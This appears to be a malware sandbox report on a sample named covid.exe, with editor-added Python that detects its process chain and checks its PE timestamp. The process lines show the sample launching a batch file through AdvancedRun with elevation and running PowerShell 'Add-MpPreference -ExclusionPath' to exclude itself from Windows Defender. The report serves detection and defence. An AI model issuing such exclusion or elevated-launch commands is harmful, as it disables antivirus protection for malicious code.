Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s615/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://mab.data.tm-awx.com/rhs&quot;
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://quantcast.mgr.consensu.org
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://reachplc.hub.loginradius.com&quot;
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.mirror.co.uk/
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: https://sectigo.com/CPS0C
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: https://sectigo.com/CPS0D
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://static.hotjar.com/c/hotjar-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://trinitymirror.grapeshot.co.uk/
Source: covid.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/champions-league
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/curtis-jones
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/premier-league
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/transfers
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_02FFCF08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_02FF2780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_02FFCEF8
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: String function: 0040B550 appears 50 times
Source: covid.exe | Static PE information: invalid certificate
Source: AdvancedRun.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (two such resources)
Source: covid.exe, 00000000.00000000.229590420.0000000000462000.00000002.00020000.sdmp | Binary or memory string: OriginalFilename ahmed.exe, vs covid.exe
Source: covid.exe | Binary or memory string: OriginalFilename ahmed.exe, vs covid.exe
Source: classification engine | Classification label: mal68.evad.winEXE@15/17@1/2
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\covid.exe | File created: C:\Users\user\MhpbFtoGWNhTPjKfwzuGgRGxjpGzfVWGJwHUxEjlTdnPIXFwm
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
Source: C:\Users\user\Desktop\covid.exe | File created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec
Source: covid.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\covid.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (2 times)
Source: C:\Users\user\Desktop\covid.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\covid.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\covid.exe | File read: C:\Windows\System32\drivers\etc\hosts (3 times)
Source: covid.exe | Virustotal: Detection: 40%
Source: covid.exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\covid.exe | File read: C:\Users\user\Desktop\covid.exe:Zone.Identifier
Source: unknown | Process created: C:\Users\user\Desktop\covid.exe 'C:\Users\user\Desktop\covid.exe'
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192
Source: C:\Users\user\Desktop\covid.exe | Process created (two separate powershell.exe instances, each with its own conhost.exe child below): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe | Process created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224
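The process chain recorded above (a dropped AdvancedRun launcher running test.bat with /RunAs 8, two powershell.exe instances adding a Defender exclusion for the sample itself, and a second copy of the launcher under a GUID name re-launching covid.exe) is the part of this report worth turning into a detection. The following is an added example by the editor, not part of the Joe Sandbox report: detection logic run over constructed process-creation events that mirror the command lines above (the PIDs, the parent relationships and the benign events are invented). It keys on the AdvancedRun command-line switches rather than the file name, because the report shows the same tool under two names, and it raises the severity when one parent both adds an exclusion and spawns the launcher.

```python
"""Detection logic for the AdvancedRun + Add-MpPreference chain (added example, not report code)."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str
    pid: int
    ppid: int
    detail: str
    severity: str


# Add-MpPreference -ExclusionPath <path>, quoted or bare.
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b.*?-ExclusionPath\s+(?:['\"]([^'\"]+)['\"]|(\S+))", re.I | re.S)
# AdvancedRun-style switches; matched on the switches, not on the image name,
# since the report shows the launcher as AdvancedRun.exe and as a GUID-named copy.
LAUNCHER_RE = re.compile(r"/EXEFilename\s+'([^']*)'.*?/RunAs\s+(\d+).*?/Run\b", re.I | re.S)
SPECIAL_RUN_RE = re.compile(r"/SpecialRun\b", re.I)
USER_WRITABLE_RE = re.compile(r"^[a-z]:\\(users|programdata|windows\\temp)\\", re.I)
SCRIPT_EXT = (".bat", ".cmd", ".ps1", ".vbs", ".js")


def user_writable(path: str) -> bool:
    """True for locations an unprivileged user can normally write to."""
    return bool(USER_WRITABLE_RE.match(path))


def match_exclusion(ev: dict):
    m = EXCLUSION_RE.search(ev["cmdline"])
    if not m:
        return None
    path = m.group(1) or m.group(2)
    sev = "high" if user_writable(path) else "medium"
    return Finding("defender_exclusion_added", ev["pid"], ev["ppid"], path, sev)


def match_launcher(ev: dict):
    m = LAUNCHER_RE.search(ev["cmdline"])
    if not m:
        return None
    target, run_as = m.group(1), int(m.group(2))
    risky = target.lower().endswith(SCRIPT_EXT) or user_writable(target)
    return Finding("advancedrun_style_launcher", ev["pid"], ev["ppid"],
                   f"{target} (RunAs={run_as})", "high" if risky else "medium")


def match_special_run(ev: dict):
    if not SPECIAL_RUN_RE.search(ev["cmdline"]):
        return None
    return Finding("launcher_self_spawn", ev["pid"], ev["ppid"], ev["cmdline"], "low")


def detect(events: list) -> list:
    """Per-event rules first; then a correlation finding when one parent both added
    a Defender exclusion and ran something through the elevating launcher."""
    findings = []
    for ev in events:
        for matcher in (match_exclusion, match_launcher, match_special_run):
            f = matcher(ev)
            if f:
                findings.append(f)
    ppid_of = {ev["pid"]: ev["ppid"] for ev in events}
    rules_by_parent = defaultdict(set)
    for f in findings:
        rules_by_parent[f.ppid].add(f.rule)
    for parent, rules in list(rules_by_parent.items()):
        if {"defender_exclusion_added", "advancedrun_style_launcher"} <= rules:
            findings.append(Finding("exclusion_plus_launcher_chain", parent, ppid_of.get(parent, 0),
                                    "same parent added a Defender exclusion and ran an elevating launcher",
                                    "critical"))
    return findings


# Constructed events modelled on the report's process tree; PIDs and parent links are invented.
TMP = r"C:\Users\user\AppData\Local\Temp"
D1 = TMP + r"\4103631a-1d7c-4a39-96f5-57019040d0ec"
D2 = TMP + r"\803d86f9-e660-44ff-a9e1-ff85b73ae661"
GUID_EXE = D2 + r"\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe"
PS = r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'"
ADD_EXCL = PS + r" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force"
TAIL = "/WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run"
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 900, "cmdline": r"'C:\Users\user\Desktop\covid.exe'"},
    {"pid": 3192, "ppid": 1000, "cmdline": rf"'{D1}\AdvancedRun.exe' /EXEFilename '{D1}\test.bat' {TAIL}"},
    {"pid": 3200, "ppid": 3192, "cmdline": rf"'{D1}\AdvancedRun.exe' /SpecialRun 4101d8 3192"},
    {"pid": 4000, "ppid": 1000, "cmdline": ADD_EXCL},
    {"pid": 4001, "ppid": 4000, "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 4004, "ppid": 1000, "cmdline": ADD_EXCL},
    {"pid": 6224, "ppid": 1000, "cmdline": rf"'{GUID_EXE}' /EXEFilename 'C:\Users\user\Desktop\covid.exe' {TAIL}"},
    {"pid": 6230, "ppid": 6224, "cmdline": rf"'{GUID_EXE}' /SpecialRun 4101d8 6224"},
    {"pid": 7000, "ppid": 900, "cmdline": PS + " Get-MpPreference"},  # benign, must not fire
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.severity:8} {f.rule:32} pid={f.pid} ppid={f.ppid} {f.detail}")
```

On a suspect host the same condition can be checked directly with `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath`; any entry pointing into a user profile or a Temp directory deserves the same scrutiny as the command line above.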
Source: C:\Users\user\Desktop\covid.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: covid.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: covid.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb | found in: AdvancedRun.exe, 00000005.00000000.268968190.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr (the same PDB path in both dropped executables, together with the identical /SpecialRun argument, shows that 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe is a second copy of AdvancedRun under a random name)
Source: covid.exe | Static PE information: 0xFBC3D040 [Wed Nov 7 21:27:28 2103 UTC]
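The report flags 0xFBC3D040 as a suspicious timestamp because the IMAGE_FILE_HEADER.TimeDateStamp decodes to the year 2103. The following is an added example by the editor, not part of the Joe Sandbox report: it reads that field straight out of the COFF header and compares it against the analysis time; the minimal PE stub it parses and the assumed analysis time are constructed. One caveat a practitioner should keep in mind when reading this indicator: compilers running in deterministic mode (Roslyn with /deterministic, MSVC with /Brepro) write a hash-derived value into this field instead of a build time, and the sample is a managed .NET binary (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR is present), so a future date on its own is weak evidence and is only meaningful together with the other signatures in this report.

```python
"""PE TimeDateStamp extraction and sanity check (added example, not report code)."""
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def pe_timestamp(data: bytes) -> int:
    """Return IMAGE_FILE_HEADER.TimeDateStamp from a PE image held in memory."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)          # IMAGE_DOS_HEADER.e_lfanew
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF header follows the 4-byte signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    (ts,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return ts


def timestamp_to_utc(ts: int) -> str:
    """Render the stamp as UTC; timedelta arithmetic keeps years past 2038 working on every platform."""
    return (EPOCH + timedelta(seconds=ts)).strftime("%Y-%m-%d %H:%M:%S UTC")


def classify_timestamp(ts: int, now: int, skew: int = 86400) -> str:
    """'zero' for a stripped stamp, 'future' if later than now plus allowed clock skew, else 'plausible'."""
    if ts == 0:
        return "zero"
    if ts > now + skew:
        return "future"
    return "plausible"


def build_stub_pe(ts: int) -> bytes:
    """Constructed minimal image: DOS header, PE signature and a COFF header carrying the stamp."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew: PE header right after DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 0, ts, 0, 0, 0, 0)    # i386, no sections, TimeDateStamp=ts
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    ANALYSIS_TIME = 1618000000  # assumed: roughly April 2021, when this report was produced
    stamp = pe_timestamp(build_stub_pe(0xFBC3D040))
    print(hex(stamp), timestamp_to_utc(stamp), classify_timestamp(stamp, ANALYSIS_TIME))
```

For a real file, replace `build_stub_pe(...)` with the bytes of the executable; the check reads only the headers, so the rest of the image is never touched.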
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040B550 push eax; ret 5_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040B550 push eax; ret 5_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040B50D push ecx; ret 5_2_0040B51D
